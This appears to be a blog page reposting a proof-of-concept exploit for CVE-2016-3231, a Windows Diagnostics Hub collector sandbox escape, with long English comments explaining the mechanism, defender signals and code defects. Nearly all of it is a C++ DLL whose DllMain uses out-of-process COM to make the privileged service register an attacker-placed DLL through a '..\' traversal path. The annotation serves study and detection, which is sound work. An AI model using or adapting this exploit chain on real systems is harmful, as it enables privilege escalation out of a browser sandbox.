  • CVE-2016-3231

    摘要:重现了下韩国小哥Lokihardt在pwn2own上的过沙箱提权漏洞。

     1 #include <windows.h>
     2 #include <atlbase.h>
     3 #include "DiagnosticsHub.StandardCollector.Runtime_h.h"
     4 
// Proof-of-concept for CVE-2016-3231 (Diagnostics Hub Standard Collector
// service, sandbox escape / elevation of privilege; the page's summary says it
// reproduces Lokihardt's pwn2own chain). Everything happens in DllMain on
// DLL_PROCESS_ATTACH: the DLL talks to the collector service over
// out-of-process COM, creates a collection session whose scratch directory
// is inside the Microsoft Edge AppContainer package folder, and then
// registers an "agent" DLL that lives in that same user-writable folder,
// addressed through a chain of "..\" traversal segments. The escalation is
// that a sandboxed caller gets a higher-privileged service to act on a DLL
// path the caller controls; what the service does with the agent path is
// not visible in this listing — presumably it loads it, confirm against the
// service binary.
//
// Defender notes: the observable signals are (1) an out-of-process COM
// activation of the collector CLSID below coming from an AppContainer /
// low-integrity process, and (2) the collector service process opening or
// loading a DLL from a per-user Packages\...\AC\...\Temp path. The issue is
// tracked as CVE-2016-3231; the hardened behaviour would presumably be for
// the service to reject non-canonical or user-writable agent paths.
//
// Code-level observations on this listing (left unchanged here):
//  - CoInitialize / CoCreateInstance are called from DllMain, i.e. under the
//    loader lock; that is unsafe in general and only tolerable in a PoC.
//  - name_size is passed as a byte count (sizeof) where GetUserName expects
//    a character count; harmless for short names but still wrong.
//  - Each FAILED(hr) branch only prints and falls through, so when an
//    earlier call failed the next call goes through an uninitialised or
//    null interface pointer.
//  - printf is used without <stdio.h>, and as rendered on this page the
//    printf format literals are split across two lines, so the listing does
//    not compile verbatim.
//  - Assumes UNICODE is defined so GetUserName / wsprintf resolve to the W
//    variants (the buffers are WCHAR) — TODO confirm project settings.
BOOL APIENTRY DllMain(HANDLE hModule, DWORD  ul_reason_for_call, LPVOID lpReserved)
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        {
            // Current user name is only needed to build the per-user
            // AppContainer paths below.
            WCHAR user_name[MAX_PATH] = { 0 };
            DWORD name_size = sizeof(user_name);   // NOTE(review): bytes, API wants characters
            GetUserName(user_name, &name_size);

            CoInitialize(0);

            HRESULT hr;
            CLSID clsid_hub;
            IID iid_IStandardCollectorService;
            IStandardCollectorService * i_StandardCollectorService;   // uninitialised; used unconditionally below

            // CLSID of the collector service and IID of its
            // IStandardCollectorService interface (values as given on the page).
            CLSIDFromString(L"{42CBFAA7-A4A7-47BB-B422-BD10E9D02700}", &clsid_hub);
            CLSIDFromString(L"{0D8AF6B7-EFD5-4F6D-A834-314740AB8CAA}", &iid_IStandardCollectorService);

            // CLSCTX_LOCAL_SERVER: the object is activated in the service's
            // own (more privileged) process, not in the caller's sandbox.
            hr = CoCreateInstance(clsid_hub, NULL, CLSCTX_LOCAL_SERVER, iid_IStandardCollectorService, (LPVOID*)&i_StandardCollectorService);
            if (FAILED(hr))
            {
                printf("CoCreateInstance failed: %08x
", hr);
            }

            SessionConfiguration session_config;
            ICollectionSession * i_CollectionSession = { 0 };
            WCHAR scratch_path[MAX_PATH] = { 0 };

            // Scratch directory is placed inside the Edge AppContainer's
            // package-local Temp folder, i.e. a location the sandboxed
            // caller can write to.
            wsprintf(scratch_path, L"C:\Users\%ws\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\Temp", user_name);
            session_config.Type = CollectionType_Etw;
            session_config.Location = CollectionLocation_Local;
            session_config.Flags = SessionConfigurationFlags_None;
            session_config.LifetimeMonitorProcessId = 0;
            session_config.SessionId = {};
            session_config.CollectorScratch = CComBSTR(scratch_path);
            session_config.ClientLocale = 0;

            hr = i_StandardCollectorService->CreateSession(&session_config, nullptr, &i_CollectionSession);
            if (FAILED(hr))
            {
                printf("CreateSession failed: %08x
", hr);
            }

            WCHAR dll_path[MAX_PATH] = { 0 };
            GUID guid = GUID_NULL;

            // Agent path is relative and climbs out with "..\" segments into the
            // same user-writable Temp folder; this is the input the service
            // should have canonicalised and rejected. The commented-out line
            // is an older package name for the same location.
            //wsprintf(dll_path, L"..\..\..\..\Users\%ws\AppData\Local\Packages\windows_ie_ac_001\AC\Temp\EoP.dll", user_name); 
            wsprintf(dll_path, L"..\..\..\..\Users\%ws\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\Temp\EoP.dll", user_name);
            hr = i_CollectionSession->AddAgent(dll_path, &guid);   // null deref if CreateSession failed
            if (FAILED(hr))
            {
                printf("AddAgent failed: %08x
", hr);
            }

            break;
        }
    case DLL_THREAD_ATTACH:
        break;
    case DLL_THREAD_DETACH:
        break;
    case DLL_PROCESS_DETACH:
        break;
    }

    // Always reports success, even when the COM calls above failed.
    return TRUE;
}
  • 原文地址:https://www.cnblogs.com/Danny-Wei/p/5790610.html